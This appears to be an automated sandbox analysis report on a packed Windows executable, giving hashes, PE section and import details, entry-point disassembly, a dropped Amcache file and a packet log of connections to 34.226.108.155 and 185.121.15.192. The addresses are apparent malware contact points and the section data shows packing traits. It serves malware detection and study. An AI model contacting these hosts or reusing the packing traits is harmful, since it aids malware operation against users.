                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="639748" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                          C:\Windows\appcompat\Programs\Amcache.hve

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:MS Windows registry file, NT/2000 or above
                                                          Category:dropped
                                                          Size (bytes):1835008
                                                          Entropy (8bit):4.468598456281871
                                                          Encrypted:false
                                                          SSDEEP:6144:kzZfpi6ceLPx9skLmb0fqZWSP3aJG8nAgeiJRMMhA2zX4WABluuNUjDH5S:KZHtqZWOKnMM6bFpGj4
                                                          MD5:06A4D3902016B6F0CF89CB2A30CB4C26
                                                          SHA1:7866DE23BA7EC624D687F4E9C177C181222427C2
                                                          SHA-256:63A61A3213810037A1DE5632CCA46670B7FC55E3E9DC5624BDA624B4B780AE6A
                                                          SHA-512:3640ACE11DFA6A408BA2653A73C2663F9E1B46CA71C85894C0DA2D24C39D2D452377F99632E0286C2F8FE5C4E9DC9748A95CABD3B699AFF66C7DC1BF193E55D1
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.B.u.R...............................................................................................................................................................................................................................................................................................................................................z.A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          Static File Info

                                                          General

                                                          File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                          Entropy (8bit):7.980881931878724
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          • VXD Driver (31/22) 0.00%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:pCElIX19tu.exe
                                                          File size:4'432'896 bytes
                                                          MD5:7e467a1f5f56ccec6f54a2eadd37986e
                                                          SHA1:426d5026d97aa82176c37fb6dfa90b0a42b0bfab
                                                          SHA256:11b8f5c194882d807a554abc6614b55cbbd45ca2370ed7cad82509653ccd39ce
                                                          SHA512:699b0ee82a3487c4b389cd64090c5491918113efa7515649957077c6fb04e03f525a81008ce42c8fa7df52321977f06e6fe77f38cb4bad22d222247ddecf614a
                                                          SSDEEP:98304:e2AcYECqRm4o4WLlZ8RjU5/T3sDnLHt8U/DxQW:e2AcYERRCejk3sDTvm
                                                          TLSH:DC263337EC0DC2E8D91E98B14269114431E9D112B3A92D357A98F7BB268F6154CF3FCA
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....cg...............(.VH...v..2...p.......pH...@.................................".C...@... ............................

                                                          File Icon

                                                          Icon Hash:00928e8e8686b000

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x1077000
                                                          Entrypoint Section:.taggant
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                                          DLL Characteristics:DYNAMIC_BASE
                                                          Time Stamp:0x67639809 [Thu Dec 19 03:50:33 2024 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                          Entrypoint Preview

                                                          Instruction
                                                          jmp 00007FC7F4BC694Ah
                                                          jc 00007FC7F4BC6989h
                                                          add byte ptr [eax], al
                                                          jmp 00007FC7F4BC8945h
                                                          add byte ptr [esi], al
                                                          or al, byte ptr [eax]
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], dh
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [edx], ah
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [ecx], al
                                                          add byte ptr [eax], 00000000h
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          adc byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          or ecx, dword ptr [edx]
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al

                                                          Data Directories

                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x74705f0x73.idata
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x7460000x1ac.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xc757240x10dpvazfap
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0xc756d40x18dpvazfap
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                          Sections

                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          0x10000x7450000x284c001e5a43568ce117c362c806c4ad4013f1unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .rsrc0x7460000x1ac0x2005cf00b76fbbbd83ca640a999e437cea3False0.580078125data4.541077045672854IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .idata 0x7470000x10000x200e84636d45557e74dadd0f14f36394655False0.166015625data1.1471680400846989IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          0x7480000x37c0000x2007e8344dc2eea4973dc5c106508340eb0unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          dpvazfap0xac40000x1b20000x1b1a006a3072c993e96064f02cdadd284ba4e4False0.9944694301311617data7.955603975345969IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          xjlvnvbq0xc760000x10000x6003789e4f9ffd70b2532bb83c9ba651a49False0.5553385416666666data4.86165882887824IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .taggant0xc770000x30000x220047fed85c764381002ba0d7397dcbc06dFalse0.05974264705882353DOS executable (COM)0.734752854322642IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                          Resources

                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                          RT_MANIFEST0xc757340x152ASCII text, with CRLF line terminators0.6479289940828402

                                                          Imports

                                                          DLLImport
                                                          kernel32.dlllstrcpy

                                                          Network Behavior

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Dec 20, 2024 16:25:23.679233074 CET49708443192.168.2.634.226.108.155
                                                          Dec 20, 2024 16:25:23.679280043 CET4434970834.226.108.155192.168.2.6
                                                          Dec 20, 2024 16:25:23.679565907 CET49708443192.168.2.634.226.108.155
                                                          Dec 20, 2024 16:25:23.694185972 CET49708443192.168.2.634.226.108.155
                                                          Dec 20, 2024 16:25:23.694197893 CET4434970834.226.108.155192.168.2.6
                                                          Dec 20, 2024 16:25:25.440870047 CET4434970834.226.108.155192.168.2.6
                                                          Dec 20, 2024 16:25:25.441463947 CET49708443192.168.2.634.226.108.155
                                                          Dec 20, 2024 16:25:25.441489935 CET4434970834.226.108.155192.168.2.6
                                                          Dec 20, 2024 16:25:25.443156004 CET4434970834.226.108.155192.168.2.6
                                                          Dec 20, 2024 16:25:25.443243980 CET49708443192.168.2.634.226.108.155
                                                          Dec 20, 2024 16:25:25.444590092 CET49708443192.168.2.634.226.108.155
                                                          Dec 20, 2024 16:25:25.444665909 CET4434970834.226.108.155192.168.2.6
                                                          Dec 20, 2024 16:25:25.455558062 CET49708443192.168.2.634.226.108.155
                                                          Dec 20, 2024 16:25:25.455576897 CET4434970834.226.108.155192.168.2.6
                                                          Dec 20, 2024 16:25:25.507654905 CET49708443192.168.2.634.226.108.155
                                                          Dec 20, 2024 16:25:25.895075083 CET4434970834.226.108.155192.168.2.6
                                                          Dec 20, 2024 16:25:25.895481110 CET4434970834.226.108.155192.168.2.6
                                                          Dec 20, 2024 16:25:25.895529985 CET49708443192.168.2.634.226.108.155
                                                          Dec 20, 2024 16:25:25.970144033 CET49708443192.168.2.634.226.108.155
                                                          Dec 20, 2024 16:25:25.970192909 CET4434970834.226.108.155192.168.2.6
                                                          Dec 20, 2024 16:25:27.273659945 CET4971080192.168.2.6185.121.15.192
                                                          Dec 20, 2024 16:25:27.393323898 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:27.396743059 CET4971080192.168.2.6185.121.15.192
                                                          Dec 20, 2024 16:25:27.397761106 CET4971080192.168.2.6185.121.15.192
                                                          Dec 20, 2024 16:25:27.517594099 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:27.517617941 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:27.517743111 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:27.517899036 CET4971080192.168.2.6185.121.15.192
                                                          Dec 20, 2024 16:25:27.567723036 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:27.567816019 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:27.567826986 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:27.567838907 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:27.567962885 CET4971080192.168.2.6185.121.15.192
                                                          Dec 20, 2024 16:25:27.568023920 CET4971080192.168.2.6185.121.15.192
                                                          Dec 20, 2024 16:25:27.573057890 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:27.573210001 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:27.573220015 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:27.573295116 CET4971080192.168.2.6185.121.15.192
                                                          Dec 20, 2024 16:25:27.637532949 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:27.637547016 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:27.637603998 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:27.637660980 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:27.637670994 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:27.637671947 CET4971080192.168.2.6185.121.15.192
                                                          Dec 20, 2024 16:25:27.637716055 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:27.637748957 CET4971080192.168.2.6185.121.15.192
                                                          Dec 20, 2024 16:25:27.637810946 CET4971080192.168.2.6185.121.15.192
                                                          Dec 20, 2024 16:25:27.734749079 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:27.734848022 CET4971080192.168.2.6185.121.15.192
                                                          Dec 20, 2024 16:25:27.798724890 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:27.798791885 CET4971080192.168.2.6185.121.15.192
                                                          Dec 20, 2024 16:25:27.898808956 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:27.958729982 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:27.958807945 CET4971080192.168.2.6185.121.15.192
                                                          Dec 20, 2024 16:25:28.158919096 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.162892103 CET4971080192.168.2.6185.121.15.192
                                                          Dec 20, 2024 16:25:28.387166977 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.387351036 CET4971080192.168.2.6185.121.15.192
                                                          Dec 20, 2024 16:25:28.387444973 CET4971080192.168.2.6185.121.15.192
                                                          Dec 20, 2024 16:25:28.507688046 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.507715940 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.507725954 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.507735968 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.507791996 CET4971080192.168.2.6185.121.15.192
                                                          Dec 20, 2024 16:25:28.507814884 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.507844925 CET4971080192.168.2.6185.121.15.192
                                                          Dec 20, 2024 16:25:28.507877111 CET4971080192.168.2.6185.121.15.192
                                                          Dec 20, 2024 16:25:28.507930994 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.507966042 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.507966042 CET4971080192.168.2.6185.121.15.192
                                                          Dec 20, 2024 16:25:28.508003950 CET4971080192.168.2.6185.121.15.192
                                                          Dec 20, 2024 16:25:28.508147001 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.508191109 CET4971080192.168.2.6185.121.15.192
                                                          Dec 20, 2024 16:25:28.508305073 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.508327961 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.508349895 CET4971080192.168.2.6185.121.15.192
                                                          Dec 20, 2024 16:25:28.508359909 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.508366108 CET4971080192.168.2.6185.121.15.192
                                                          Dec 20, 2024 16:25:28.508397102 CET4971080192.168.2.6185.121.15.192
                                                          Dec 20, 2024 16:25:28.508814096 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.508835077 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.508883953 CET4971080192.168.2.6185.121.15.192
                                                          Dec 20, 2024 16:25:28.509597063 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.509788990 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.509903908 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.539460897 CET4971080192.168.2.6185.121.15.192
                                                          Dec 20, 2024 16:25:28.627711058 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.627866983 CET4971080192.168.2.6185.121.15.192
                                                          Dec 20, 2024 16:25:28.630553007 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.630647898 CET4971080192.168.2.6185.121.15.192
                                                          Dec 20, 2024 16:25:28.645211935 CET4971080192.168.2.6185.121.15.192
                                                          Dec 20, 2024 16:25:28.659347057 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.659480095 CET4971080192.168.2.6185.121.15.192
                                                          Dec 20, 2024 16:25:28.661390066 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.661497116 CET4971080192.168.2.6185.121.15.192
                                                          Dec 20, 2024 16:25:28.747850895 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.747896910 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.750529051 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.750629902 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.750828028 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.750883102 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.750911951 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.750946045 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.751365900 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.754223108 CET4971080192.168.2.6185.121.15.192
                                                          Dec 20, 2024 16:25:28.764993906 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.765059948 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.765077114 CET4971080192.168.2.6185.121.15.192
                                                          Dec 20, 2024 16:25:28.765089035 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.765113115 CET4971080192.168.2.6185.121.15.192
                                                          Dec 20, 2024 16:25:28.765119076 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.765141964 CET4971080192.168.2.6185.121.15.192
                                                          Dec 20, 2024 16:25:28.765165091 CET4971080192.168.2.6185.121.15.192
                                                          Dec 20, 2024 16:25:28.765304089 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.765333891 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.765356064 CET4971080192.168.2.6185.121.15.192
                                                          Dec 20, 2024 16:25:28.765363932 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.765384912 CET4971080192.168.2.6185.121.15.192
                                                          Dec 20, 2024 16:25:28.765393019 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.765417099 CET4971080192.168.2.6185.121.15.192
                                                          Dec 20, 2024 16:25:28.765423059 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.765444040 CET4971080192.168.2.6185.121.15.192
                                                          Dec 20, 2024 16:25:28.765467882 CET4971080192.168.2.6185.121.15.192
                                                          Dec 20, 2024 16:25:28.765477896 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.765506983 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.765526056 CET4971080192.168.2.6185.121.15.192
                                                          Dec 20, 2024 16:25:28.765535116 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.765567064 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.765597105 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.765651941 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.765681028 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.765708923 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.765738010 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.765810013 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.765839100 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.765866041 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.765893936 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.766097069 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.766125917 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.766154051 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.766182899 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.779350042 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.779413939 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.781286001 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.781374931 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.781405926 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.781435013 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.781483889 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.781512022 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.781541109 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.781620026 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.781652927 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.781814098 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.781862020 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.781878948 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.781893969 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.781959057 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.781971931 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.782006025 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.782018900 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.782032013 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.782176971 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.782188892 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.782202959 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.782216072 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.782227993 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.782381058 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.782391071 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.782399893 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.789859056 CET4971080192.168.2.6185.121.15.192
                                                          Dec 20, 2024 16:25:28.789942026 CET4971080192.168.2.6185.121.15.192
                                                          Dec 20, 2024 16:25:28.874202013 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.874296904 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.874388933 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.874416113 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.874443054 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.874468088 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.874495029 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.874519110 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.874563932 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.874592066 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.874622107 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.874706984 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.874732971 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.874757051 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.874819994 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.874906063 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.874931097 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.874957085 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.875046968 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.875076056 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.875236988 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.875262976 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.875288010 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.875334024 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.875418901 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.875443935 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.875554085 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.875601053 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.875677109 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.875701904 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.875732899 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.875761032 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.875787020 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.875811100 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.884886026 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.884954929 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.885082006 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.885109901 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.885138988 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.885524035 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.885591984 CET8049710185.121.15.192192.168.2.6
                                                          Dec 20, 2024 16:25:28.885987043 CET8049710185.121.15.192192.168.2.6
